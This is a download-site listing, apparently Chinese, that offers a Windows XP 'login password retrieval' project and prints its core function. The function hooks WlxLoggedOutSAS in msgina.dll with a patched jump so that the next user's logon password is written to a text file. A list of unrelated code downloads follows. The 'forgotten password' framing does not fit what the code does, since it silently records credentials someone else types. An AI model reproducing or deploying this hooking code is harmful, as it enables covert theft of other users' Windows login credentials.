登录
首页 » Windows开发 » 获取XP登录密码

获取XP登录密码

于 2023-08-31 发布 文件大小:401.27 kB
0 148
下载积分: 2 下载次数: 1

代码说明:

应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam) { //得到msgina.dll //hooktable.hMsgina  int n = 0; hooktable.hMsgina = LoadLibrary("msgina.dll"); n  = GetLastError(); if (NULL == hooktable.hMsgina) { printf("getmoduleHandle msgina.dll error"); return -1; } //得到WlxLoggedOutSAS hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS"); if (NULL == hooktable.OldADDR) { printf("GetProcAddress WlxLoggedOutSAS error"); return -1; } int *OpCode = (int*)&hooktable.charJmpCode[1]; int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5; *OpCode = Code; HookWlxLoggedOutSAS(); return 0; }

下载说明:请别用迅雷下载,失败请重下,重下不扣分!

发表评论

0 个回复

  • good website
    2022-04-24 00:17:52下载
    积分:1
  • just learning programming, exhibitions
    刚学编程,多多指教-just learning programming, exhibitions
    2022-05-24 09:45:50下载
    积分:1
  • 包含数十个经典算法的C语言实现,绝对经典!
    包含数十个经典算法的C语言实现,绝对经典!-Contains dozens of classic algorithm for the realization of the C language, an absolute classic!
    2022-05-07 01:03:32下载
    积分:1
  • right voice for a pre
    对语音进行一个预处理,历史上的语音比较流畅,就需要一个语音
    2023-06-19 04:40:03下载
    积分:1
  • 手机端,实现机画面更改,第二屏和第三批
    手机端,实现开机画面更改,第二屏和第三批-Mobile terminal to realize the boot screen to change, and the second and third screen
    2022-04-13 15:06:42下载
    积分:1
  • 鼠标边框的显示方式
    鼠标边框的显示方式-the vision mode of mouse frame
    2022-03-02 00:45:21下载
    积分:1
  • VC++编程技术与难点剖析 出版社: 清华大学出版社 装帧: 平装 出版年: 2002...
    VC++编程技术与难点剖析 出版社: 清华大学出版社 装帧: 平装 出版年: 2002-4-1 随书光盘-VC++ Programming technology and difficult problem of analysis Publisher: Tsinghua University Press Binding: Paperback Publication Year: 2002-4-1 book with CD-ROM
    2022-02-04 19:11:23下载
    积分:1
  • RC500 DEMO 上位板 的测试程序压缩包。
    RC500 DEMO 上位板 的测试程序压缩包。-RC500 DEMO upper plate compression test program packages.
    2023-04-01 12:15:03下载
    积分:1
  • = = = = = = =
    === === = Transform Picture ! Zoom in, zoom out and change color on fly! This code is free to use for any purpose, you should keep the original copyright: Copyright (C) 2003 Free Code http://www.emu8086.com/vb/ For comments: info@emu8086.com =========================================== It s not my best code :) but still worth looking at. My greatest work is "Real Show", you can find it on my web site: http://www.emu8086.com/vb/ I wrote it both in Java and VB, so it can work directly from your web site !! I hope to update this sample, and add more effects in the near future! -=== === === === = Transform Picture ! Zoom in, zoom out and change color on fly! This code is free to use for any purpose, you should keep the original copyright: Copyright (C) 2003 Free Code http://www.emu8086.com/vb/ For comments: info@emu8086.com =========================================== It s not my best code :)
    2022-01-25 20:45:22下载
    积分:1
  • 系统的连表学习文件
    系统的连表学习文件-system to study the documents even Table
    2022-01-26 02:59:20下载
    积分:1
  • 696518资源总数
  • 106227会员总数
  • 11今日下载